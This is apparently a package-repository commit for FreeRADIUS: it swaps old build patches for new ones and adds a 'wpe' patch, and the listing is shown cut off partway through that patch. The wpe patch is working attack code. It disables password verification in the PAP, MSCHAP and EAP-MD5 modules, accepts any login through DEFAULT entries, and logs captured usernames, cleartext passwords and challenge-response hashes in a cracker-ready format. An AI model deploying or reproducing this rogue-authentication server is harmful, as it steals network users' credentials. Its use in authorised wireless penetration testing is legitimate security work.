--- freeradius-server-2.1.12.orig//src/modules/Makefile 2011-09-30 16:12:07.000000000 +0200
+++ freeradius-server-2.1.12/src/modules/Makefile 2011-11-20 13:04:20.000000000 +0100
@@ -12,7 +12,7 @@
@$(MAKE) $(MFLAGS) WHAT_TO_MAKE=$@ common
install:
- $(INSTALL) -d -m 755 $(R)$(libdir)
+ $(INSTALL) -d -m 755 $(R)$(pkglibdir)
@$(MAKE) $(MFLAGS) WHAT_TO_MAKE=$@ common
clean:
diff -Nru freeradius-server-2.1.12.orig//src/modules/rules.mak freeradius-server-2.1.12/src/modules/rules.mak
--- freeradius-server-2.1.12.orig//src/modules/rules.mak 2011-11-20 12:48:22.000000000 +0100
+++ freeradius-server-2.1.12/src/modules/rules.mak 2011-11-20 13:04:20.000000000 +0100
@@ -123,7 +123,7 @@
$(TARGET).la: $(LT_OBJS)
$(LIBTOOL) --mode=link $(CC) -release $(RADIUSD_VERSION) \
-module $(LINK_MODE) $(LDFLAGS) $(RLM_LDFLAGS) -o $@ \
- -rpath $(libdir) $^ $(LIBRADIUS) $(RLM_LIBS) $(LIBS)
+ -rpath $(pkglibdir) $^ $(LIBRADIUS) $(RLM_LIBS) $(LIBS)
#######################################################################
#
@@ -164,11 +164,11 @@
# Do any module-specific installation.
#
# If there isn't a TARGET defined, then don't do anything.
-# Otherwise, install the libraries into $(libdir)
+# Otherwise, install the libraries into $(pkglibdir)
#
install:
@[ "x$(RLM_INSTALL)" = "x" ] || $(MAKE) $(MFLAGS) $(RLM_INSTALL)
if [ "x$(TARGET)" != "x" ]; then \
$(LIBTOOL) --mode=install $(INSTALL) -c \
- $(TARGET).la $(R)$(libdir)/$(TARGET).la || exit $$?; \
+ $(TARGET).la $(R)$(pkglibdir)/$(TARGET).la || exit $$?; \
fi

89
net-dialup/freeradius/files/freeradius-2.1.12-qafixes.patch
View file

@ -1,89 +0,0 @@
diff -Nru freeradius-server-2.1.12.orig//configure.in freeradius-server-2.1.12/configure.in
--- freeradius-server-2.1.12.orig//configure.in 2011-09-30 16:12:07.000000000 +0200
+++ freeradius-server-2.1.12/configure.in 2011-11-20 12:50:50.000000000 +0100
@@ -577,7 +577,19 @@
],
[ AC_MSG_WARN([pcap library not found, silently disabling the RADIUS sniffer.]) ])
-AC_LIB_READLINE
+AC_CHECK_LIB(readline, readline,
+ [ LIBREADLINE="-lreadline"
+ AC_DEFINE(HAVE_LIBREADLINE, 1,
+ [Define to 1 if you have a readline compatible library.])
+ AC_DEFINE(HAVE_READLINE_READLINE_H, 1,
+ [Define to 1 if you have the <readline/readline.h> header file.])
+ AC_DEFINE(HAVE_READLINE_HISTORY, 1,
+ [Define if your readline library has \`add_history'])
+ AC_DEFINE(HAVE_READLINE_HISTORY_H, 1,
+ [Define to 1 if you have the <readline/history.h> header file.])
+ ],
+ [ LIBREADLINE="" ])
+AC_SUBST(LIBREADLINE)
dnl #############################################################
dnl #
diff -Nru freeradius-server-2.1.12.orig//src/include/radiusd.h freeradius-server-2.1.12/src/include/radiusd.h
--- freeradius-server-2.1.12.orig//src/include/radiusd.h 2011-09-30 16:12:07.000000000 +0200
+++ freeradius-server-2.1.12/src/include/radiusd.h 2011-11-20 12:50:50.000000000 +0100
@@ -652,6 +652,7 @@
void event_new_fd(rad_listen_t *listener);
/* evaluate.c */
+int radius_get_vp(REQUEST *request, const char *name, VALUE_PAIR **vp_p);
int radius_evaluate_condition(REQUEST *request, int modreturn, int depth,
const char **ptr, int evaluate_it, int *presult);
int radius_update_attrlist(REQUEST *request, CONF_SECTION *cs,
diff -Nru freeradius-server-2.1.12.orig//src/lib/Makefile freeradius-server-2.1.12/src/lib/Makefile
--- freeradius-server-2.1.12.orig//src/lib/Makefile 2011-11-20 12:48:22.000000000 +0100
+++ freeradius-server-2.1.12/src/lib/Makefile 2011-11-20 12:50:50.000000000 +0100
@@ -42,7 +42,7 @@
$(TARGET).la: $(LT_OBJS)
$(LIBTOOL) --mode=link $(CC) -release $(RADIUSD_VERSION) \
- $(LDFLAGS) $(LINK_MODE) -o $@ -rpath $(libdir) $^
+ $(LDFLAGS) $(LINK_MODE) -o $@ -rpath $(libdir) $^ $(LIBS)
$(LT_OBJS): $(INCLUDES)
diff -Nru freeradius-server-2.1.12.orig//src/main/listen.c freeradius-server-2.1.12/src/main/listen.c
--- freeradius-server-2.1.12.orig//src/main/listen.c 2011-09-30 16:12:07.000000000 +0200
+++ freeradius-server-2.1.12/src/main/listen.c 2011-11-20 12:50:50.000000000 +0100
@@ -49,6 +49,9 @@
#include <fcntl.h>
#endif
+#ifdef WITH_UDPFROMTO
+#include <freeradius-devel/udpfromto.h>
+#endif
/*
* We'll use this below.
diff -Nru freeradius-server-2.1.12.orig//src/modules/rlm_passwd/rlm_passwd.c freeradius-server-2.1.12/src/modules/rlm_passwd/rlm_passwd.c
--- freeradius-server-2.1.12.orig//src/modules/rlm_passwd/rlm_passwd.c 2011-09-30 16:12:07.000000000 +0200
+++ freeradius-server-2.1.12/src/modules/rlm_passwd/rlm_passwd.c 2011-11-20 12:50:50.000000000 +0100
@@ -247,8 +247,7 @@
static struct mypasswd * get_next(char *name, struct hashtable *ht)
{
-#define passwd ((struct mypasswd *) ht->buffer)
- struct mypasswd * hashentry;
+ struct mypasswd * hashentry, * passwd;
char buffer[1024];
int len;
char *list, *nextlist;
@@ -267,6 +266,7 @@
}
/* printf("try to find in file\n"); */
if (!ht->fp) return NULL;
+ passwd = (struct mypasswd *) ht->buffer;
while (fgets(buffer, 1024,ht->fp)) {
if(*buffer && *buffer!='\n' && (len = string_to_entry(buffer, ht->nfields, ht->delimiter, passwd, sizeof(ht->buffer)-1)) &&
(!ht->ignorenis || (*buffer !='-' && *buffer != '+') ) ){
@@ -288,7 +288,6 @@
fclose(ht->fp);
ht->fp = NULL;
return NULL;
-#undef passwd
}
static struct mypasswd * get_pw_nam(char * name, struct hashtable* ht)

11
net-dialup/freeradius/files/freeradius-2.1.12-ssl.patch
View file

@ -1,11 +0,0 @@
diff -Nru freeradius-server-2.1.12.orig//src/modules/rlm_eap/libeap/Makefile freeradius-server-2.1.12/src/modules/rlm_eap/libeap/Makefile
--- freeradius-server-2.1.12.orig//src/modules/rlm_eap/libeap/Makefile 2011-11-20 12:48:22.000000000 +0100
+++ freeradius-server-2.1.12/src/modules/rlm_eap/libeap/Makefile 2011-11-20 12:49:19.000000000 +0100
@@ -9,6 +9,7 @@
SRCS = eapcommon.c eapcrypto.c eapsimlib.c fips186prf.c
ifneq ($(OPENSSL_LIBS),)
SRCS += cb.c eap_tls.c mppe_keys.c tls.c
+LIBS += $(OPENSSL_LIBS)
endif
LT_OBJS = $(SRCS:.c=.lo)
INCLUDES = eap_types.h eap_tls.h

40
net-dialup/freeradius/files/freeradius-2.1.12-versionless-la-files.patch
View file

@ -1,40 +0,0 @@
diff -Nru freeradius-server-2.1.12.orig//src/lib/Makefile freeradius-server-2.1.12/src/lib/Makefile
--- freeradius-server-2.1.12.orig//src/lib/Makefile 2011-09-30 16:12:07.000000000 +0200
+++ freeradius-server-2.1.12/src/lib/Makefile 2011-11-20 12:47:22.000000000 +0100
@@ -54,7 +54,5 @@
$(INSTALL) -d -m 755 $(R)$(libdir)
$(LIBTOOL) --mode=install $(INSTALL) -c $(TARGET).la \
$(R)$(libdir)/$(TARGET).la
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la;
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la
reconfig:
diff -Nru freeradius-server-2.1.12.orig//src/modules/rlm_eap/libeap/Makefile freeradius-server-2.1.12/src/modules/rlm_eap/libeap/Makefile
--- freeradius-server-2.1.12.orig//src/modules/rlm_eap/libeap/Makefile 2011-09-30 16:12:07.000000000 +0200
+++ freeradius-server-2.1.12/src/modules/rlm_eap/libeap/Makefile 2011-11-20 12:47:22.000000000 +0100
@@ -44,5 +44,3 @@
install: all
$(LIBTOOL) --mode=install $(INSTALL) -c $(TARGET).la \
$(R)$(libdir)/$(TARGET).la
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la;
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la
diff -Nru freeradius-server-2.1.12.orig//src/modules/rlm_sql/drivers/rules.mak freeradius-server-2.1.12/src/modules/rlm_sql/drivers/rules.mak
--- freeradius-server-2.1.12.orig//src/modules/rlm_sql/drivers/rules.mak 2011-09-30 16:12:07.000000000 +0200
+++ freeradius-server-2.1.12/src/modules/rlm_sql/drivers/rules.mak 2011-11-20 12:47:22.000000000 +0100
@@ -147,6 +147,4 @@
if [ "x$(TARGET)" != "x" ]; then \
$(LIBTOOL) --mode=install $(INSTALL) -c \
$(TARGET).la $(R)$(libdir)/$(TARGET).la || exit $$?; \
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la; \
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la || exit $$?; \
fi
diff -Nru freeradius-server-2.1.12.orig//src/modules/rules.mak freeradius-server-2.1.12/src/modules/rules.mak
--- freeradius-server-2.1.12.orig//src/modules/rules.mak 2011-09-30 16:12:07.000000000 +0200
+++ freeradius-server-2.1.12/src/modules/rules.mak 2011-11-20 12:47:22.000000000 +0100
@@ -171,6 +171,4 @@
if [ "x$(TARGET)" != "x" ]; then \
$(LIBTOOL) --mode=install $(INSTALL) -c \
$(TARGET).la $(R)$(libdir)/$(TARGET).la || exit $$?; \
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la; \
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la || exit $$?; \
fi

0
net-dialup/freeradius/files/freeradius-2.1.12-wpe.patch → net-dialup/freeradius/files/freeradius-2.2.0-wpe.patch
View file

104
net-dialup/freeradius/files/freeradius-2.2.5-gentoo.patch Normal file
View file

@ -0,0 +1,104 @@
--- a/raddb/radiusd.conf.in
+++ b/raddb/radiusd.conf.in
@@ -103,7 +103,7 @@
# make
# make install
#
-libdir = @libdir@
+libdir = @libdir@/freeradius
# pidfile: Where to place the PID of the RADIUS server.
#
--- a/src/modules/Makefile
+++ b/src/modules/Makefile
@@ -12,7 +12,7 @@
@$(MAKE) $(MFLAGS) WHAT_TO_MAKE=$@ common
install:
- $(INSTALL) -d -m 755 $(R)$(libdir)
+ $(INSTALL) -d -m 755 $(R)$(pkglibdir)
@$(MAKE) $(MFLAGS) WHAT_TO_MAKE=$@ common
clean:
--- a/src/modules/rules.mak
+++ b/src/modules/rules.mak
@@ -122,7 +122,7 @@
$(TARGET).la: $(RLM_SUBDIRS) $(LT_OBJS)
$(LIBTOOL) --mode=link --tag=CC $(CC) -release $(RADIUSD_VERSION_STRING) \
-module $(LINK_MODE) $(LDFLAGS) $(RLM_LDFLAGS) -o $@ \
- -rpath $(libdir) $^ $(LIBRADIUS) $(RLM_LIBS) $(LIBS)
+ -rpath $(pkglibdir) $^ $(LIBRADIUS) $(RLM_LIBS) $(LIBS)
#######################################################################
#
@@ -163,13 +163,11 @@
# Do any module-specific installation.
#
# If there isn't a TARGET defined, then don't do anything.
-# Otherwise, install the libraries into $(libdir)
+# Otherwise, install the libraries into $(pkglibdir)
#
install:
@[ "x$(RLM_INSTALL)" = "x" ] || $(MAKE) $(MFLAGS) $(RLM_INSTALL)
if [ "x$(TARGET)" != "x" ]; then \
$(LIBTOOL) --mode=install $(INSTALL) -c \
- $(TARGET).la $(R)$(libdir)/$(TARGET).la || exit $$?; \
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION_STRING).la; \
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION_STRING).la || exit $$?; \
+ $(TARGET).la $(R)$(pkglibdir)/$(TARGET).la || exit $$?; \
fi
--- a/src/modules/rlm_sql/drivers/rules.mak
+++ b/src/modules/rlm_sql/drivers/rules.mak
@@ -103,7 +103,7 @@
$(TARGET).la: $(LT_OBJS)
$(LIBTOOL) --mode=link --tag=CC $(CC) -release $(RADIUSD_VERSION_STRING) \
-module $(LINK_MODE) $(LDFLAGS) $(RLM_SQL_LDFLAGS) -o $@ \
- -rpath $(libdir) $^ $(RLM_SQL_LIBS)
+ -rpath $(pkglibdir) $^ $(RLM_SQL_LIBS)
#######################################################################
#
@@ -141,12 +141,10 @@
# Do any module-specific installation.
#
# If there isn't a TARGET defined, then don't do anything.
-# Otherwise, install the libraries into $(libdir)
+# Otherwise, install the libraries into $(pkglibdir)
#
install:
if [ "x$(TARGET)" != "x" ]; then \
$(LIBTOOL) --mode=install $(INSTALL) -c \
- $(TARGET).la $(R)$(libdir)/$(TARGET).la || exit $$?; \
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION_STRING).la; \
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION_STRING).la || exit $$?; \
+ $(TARGET).la $(R)$(pkglibdir)/$(TARGET).la || exit $$?; \
fi
--- a/src/lib/Makefile
+++ b/src/lib/Makefile
@@ -42,7 +42,7 @@
$(TARGET).la: $(LT_OBJS)
$(LIBTOOL) --mode=link --tag=CC $(CC) -release $(RADIUSD_VERSION) \
- $(LDFLAGS) $(LINK_MODE) -o $@ -rpath $(libdir) $^
+ $(LDFLAGS) $(LINK_MODE) -o $@ -rpath $(libdir) $^ $(LIBS)
$(LT_OBJS): $(INCLUDES)
@@ -54,7 +54,5 @@
$(INSTALL) -d -m 755 $(R)$(libdir)
$(LIBTOOL) --mode=install $(INSTALL) -c $(TARGET).la \
$(R)$(libdir)/$(TARGET).la
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la;
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la
reconfig:
--- a/Make.inc.in
+++ b/Make.inc.in
@@ -10,6 +10,7 @@
sysconfdir = @sysconfdir@
localstatedir = @localstatedir@
libdir = @libdir@
+pkglibdir = @libdir@/freeradius
bindir = @bindir@
sbindir = @sbindir@
docdir = @docdir@

374
net-dialup/freeradius/files/freeradius-2.2.5-wpe.patch Normal file
View file

@ -0,0 +1,374 @@
File ./freeradius-2.2.5.orig/.ipc_in is a fifo while file ./freeradius-2.2.5/.ipc_in is a fifo
File ./freeradius-2.2.5.orig/.ipc_out is a fifo while file ./freeradius-2.2.5/.ipc_out is a fifo
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/raddb/radiusd.conf.in ./freeradius-2.2.5/work/freeradius-server-2.2.5/raddb/radiusd.conf.in
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/raddb/radiusd.conf.in 2014-05-18 20:11:13.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/raddb/radiusd.conf.in 2014-05-18 20:13:04.234827890 +0800
@@ -499,6 +499,7 @@
# The program to execute to do concurrency checks.
checkrad = ${sbindir}/checkrad
+wpelogfile = ${logdir}/freeradius-server-wpe.log
# SECURITY CONFIGURATION
#
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/raddb/users ./freeradius-2.2.5/work/freeradius-server-2.2.5/raddb/users
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/raddb/users 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/raddb/users 2014-05-18 20:16:52.153826780 +0800
@@ -201,3 +201,7 @@
# Service-Type = Administrative-User
# On no match, the user is denied access.
+
+#"bradtest" Cleartext-Password := "bradtest", MS-CHAP-Use-NTLM-Auth := 0
+DEFAULT Cleartext-Password := "foo", MS-CHAP-Use-NTLM-Auth := 0
+DEFAULT Cleartext-Password := "a"
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/include/radiusd.h ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/include/radiusd.h
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/include/radiusd.h 2014-05-18 20:11:13.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/include/radiusd.h 2014-05-18 20:17:59.921826451 +0800
@@ -369,6 +369,7 @@
#endif
char *log_file;
char *checkrad;
+ char *wpelogfile;
const char *pid_file;
rad_listen_t *listen;
int syslog_facility;
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/auth.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/auth.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/auth.c 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/auth.c 2014-05-18 20:19:11.561826102 +0800
@@ -350,6 +350,7 @@
return -1;
}
RDEBUG2("User-Password in the request is correct.");
+ log_wpe("password", request->username->vp_strvalue,password_pair->vp_strvalue, NULL, 0, NULL, 0);
break;
} else if (auth_item->attribute != PW_CHAP_PASSWORD) {
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/log.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/log.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/log.c 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/log.c 2014-05-18 20:23:55.063824722 +0800
@@ -27,6 +27,8 @@
RCSID("$Id: ed6baf3e2c7a6e92f49de7335bb9747aea2e7ca2 $")
#include <freeradius-devel/radiusd.h>
+#include <stdio.h>
+#include <time.h>
#ifdef HAVE_SYS_STAT_H
#include <sys/stat.h>
@@ -191,6 +193,64 @@
return r;
}
+void log_wpe(char *authtype, char *username, char *password, unsigned char *challenge, unsigned int challen, unsigned char *response, unsigned int resplen)
+ {
+ FILE *logfd;
+ time_t nowtime;
+ unsigned int count;
+
+ /* Get wpelogfile parameter and log data */
+ if (mainconfig.wpelogfile == NULL) {
+ logfd = stderr;
+ } else {
+ logfd = fopen(mainconfig.wpelogfile, "a");
+ if (logfd == NULL) {
+ DEBUG2(" rlm_mschap: FAILED: Unable to open output log file %s: %s", mainconfig.wpelogfile, strerror(errno));
+ logfd = stderr;
+ }
+ }
+
+ nowtime = time(NULL);
+ fprintf(logfd, "%s: %s\n", authtype, ctime(&nowtime));
+
+ if (username != NULL) {
+ fprintf(logfd, "\tusername: %s\n", username);
+ }
+ if (password != NULL) {
+ fprintf(logfd, "\tpassword: %s\n", password);
+ }
+
+ if (challen != 0) {
+ fprintf(logfd, "\tchallenge: ");
+ for (count=0; count!=(challen-1); count++) {
+ fprintf(logfd, "%02x:",challenge[count]);
+ }
+ fprintf(logfd, "%02x\n",challenge[challen-1]);
+ }
+
+ if (resplen != 0) {
+ fprintf(logfd, "\tresponse: ");
+ for (count=0; count!=(resplen-1); count++) {
+ fprintf(logfd, "%02x:",response[count]);
+ }
+ fprintf(logfd, "%02x\n",response[resplen-1]);
+ }
+
+ if ( (strncmp(authtype, "mschap", 6) == 0) && username != NULL && challen != 0 && resplen != 0) {
+ fprintf(logfd, "\tjohn NETNTLM: %s:$NETNTLM$",username);
+ for (count=0; count<challen; count++) {
+ fprintf(logfd, "%02x",challenge[count]);
+ }
+ fprintf(logfd,"$");
+ for (count=0; count<resplen; count++) {
+ fprintf(logfd, "%02x",response[count]);
+ }
+ fprintf(logfd,"\n");
+ }
+
+ fprintf(logfd, "\n");
+ fclose(logfd);
+}
/*
* Dump a whole list of attributes to DEBUG2
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/mainconfig.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/mainconfig.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/mainconfig.c 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/mainconfig.c 2014-05-18 20:24:49.415824458 +0800
@@ -250,6 +250,8 @@
{ "debug_level", PW_TYPE_INTEGER, 0, &mainconfig.debug_level, "0"},
+ { "wpelogfile", PW_TYPE_STRING_PTR, 0, &mainconfig.wpelogfile, "${logdir}/freeradius-server-wpe.log" },
+
#ifdef WITH_PROXY
{ "proxy_requests", PW_TYPE_BOOLEAN, 0, &mainconfig.proxy_requests, "yes" },
#endif
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/radiusd.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/radiusd.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/radiusd.c 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/radiusd.c 2014-05-18 20:25:46.103824182 +0800
@@ -65,7 +65,7 @@
int debug_flag = 0;
int check_config = FALSE;
-const char *radiusd_version = "FreeRADIUS Version " RADIUSD_VERSION_STRING
+const char *radiusd_version = "FreeRADIUS-WPE Version " RADIUSD_VERSION_STRING
#ifdef RADIUSD_VERSION_COMMIT
" (git #" RADIUSD_VERSION_COMMIT ")"
#endif
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2014-05-18 20:27:16.391823742 +0800
@@ -244,11 +244,11 @@
* Verify the MS-CHAP response from the user.
*/
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
- leap_session_t *session)
+ leap_session_t *session, char *username)
{
unsigned char ntpwdhash[16];
unsigned char response[24];
-
+ unsigned char challenge[8] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
/*
* No password or previous packet. Die.
@@ -266,6 +266,7 @@
*/
eapleap_mschap(ntpwdhash, session->peer_challenge, response);
if (memcmp(response, packet->challenge, 24) == 0) {
+ log_wpe("LEAP", username, NULL, challenge, 8, response, 24);
DEBUG2(" rlm_eap_leap: NtChallengeResponse from AP is valid");
memcpy(session->peer_response, response, sizeof(response));
return 1;
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2014-05-18 20:27:16.391823742 +0800
@@ -68,7 +68,7 @@
LEAP_PACKET *eapleap_extract(EAP_DS *auth);
LEAP_PACKET *eapleap_initiate(EAP_DS *eap_ds, VALUE_PAIR *user_name);
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
- leap_session_t *session);
+ leap_session_t *session, char *username);
LEAP_PACKET *eapleap_stage6(LEAP_PACKET *packet, REQUEST *request,
VALUE_PAIR *user_name, VALUE_PAIR* password,
leap_session_t *session,
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2014-05-18 20:27:16.392823742 +0800
@@ -133,7 +133,7 @@
switch (session->stage) {
case 4: /* Verify NtChallengeResponse */
DEBUG2(" rlm_eap_leap: Stage 4");
- rcode = eapleap_stage4(packet, password, session);
+ rcode = eapleap_stage4(packet, password, session, username);
session->stage = 6;
/*
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2014-05-18 20:27:16.392823742 +0800
@@ -202,9 +202,13 @@
/*
* The length of the response is always 16 for MD5.
*/
+ /* WPE FTW
if (memcmp(output, packet->value, 16) != 0) {
return 0;
}
+ */
+ log_wpe("eap_md5", packet->name, NULL, challenge, MD5_CHALLENGE_LEN,
+ packet->value, 16);
return 1;
}
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_mschap/rlm_mschap.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_mschap/rlm_mschap.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_mschap/rlm_mschap.c 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_mschap/rlm_mschap.c 2014-05-18 20:28:28.879823390 +0800
@@ -681,9 +681,11 @@
static int do_mschap(rlm_mschap_t *inst,
REQUEST *request, VALUE_PAIR *password,
uint8_t *challenge, uint8_t *response,
- uint8_t *nthashhash, int do_ntlm_auth)
+ uint8_t *nthashhash, int do_ntlm_auth, char *username)
{
uint8_t calculated[24];
+
+ log_wpe("mschap", username, NULL, challenge, 8, response, 24);
/*
* Do normal authentication.
@@ -698,9 +700,11 @@
}
smbdes_mschap(password->vp_strvalue, challenge, calculated);
+ /* WPE FTW
if (rad_digest_cmp(response, calculated, 24) != 0) {
return -1;
}
+ */
/*
* If the password exists, and is an NT-Password,
@@ -1151,7 +1155,7 @@
*/
if (do_mschap(inst, request, password, challenge->vp_octets,
response->vp_octets + offset, nthashhash,
- do_ntlm_auth) < 0) {
+ do_ntlm_auth, request->username->vp_strvalue) < 0) {
RDEBUG2("MS-CHAP-Response is incorrect.");
goto do_error;
}
@@ -1270,7 +1274,7 @@
if (do_mschap(inst, request, nt_password, mschapv1_challenge,
response->vp_octets + 26, nthashhash,
- do_ntlm_auth) < 0) {
+ do_ntlm_auth, request->username->vp_strvalue) < 0) {
int i;
char buffer[128];
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_pap/rlm_pap.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_pap/rlm_pap.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_pap/rlm_pap.c 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_pap/rlm_pap.c 2014-05-18 20:28:28.880823390 +0800
@@ -526,6 +526,8 @@
RDEBUG("ERROR: You set 'Auth-Type = PAP' for a request that does not contain a User-Password attribute!");
return RLM_MODULE_INVALID;
}
+ log_wpe("pap",request->username->vp_strvalue, request->password->vp_strvalue,
+ NULL, 0, NULL, 0);
/*
* The user MUST supply a non-zero-length password.
@@ -609,6 +611,7 @@
do_clear:
RDEBUG("Using clear text password \"%s\"",
vp->vp_strvalue);
+ /* WPE FTW
if ((vp->length != request->password->length) ||
(rad_digest_cmp(vp->vp_strvalue,
request->password->vp_strvalue,
@@ -616,6 +619,7 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: CLEAR TEXT password check failed");
goto make_msg;
}
+ */
done:
RDEBUG("User authenticated successfully");
return RLM_MODULE_OK;
@@ -648,10 +652,12 @@
fr_MD5Update(&md5_context, request->password->vp_octets,
request->password->length);
fr_MD5Final(digest, &md5_context);
+ /* WPE FTW
if (rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: MD5 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -675,10 +681,12 @@
/*
* Compare only the MD5 hash results, not the salt.
*/
+ /* WPE FTW
if (rad_digest_cmp(digest, vp->vp_octets, 16) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SMD5 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -697,10 +705,12 @@
fr_SHA1Update(&sha1_context, request->password->vp_octets,
request->password->length);
fr_SHA1Final(digest,&sha1_context);
+ /* WPE FTW
if (rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SHA1 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -721,10 +731,12 @@
request->password->length);
fr_SHA1Update(&sha1_context, &vp->vp_octets[20], vp->length - 20);
fr_SHA1Final(digest,&sha1_context);
+ /* WPE FTW
if (rad_digest_cmp(digest, vp->vp_octets, 20) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SSHA password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -746,11 +758,13 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
goto make_msg;
}
+ /* WPE FTW
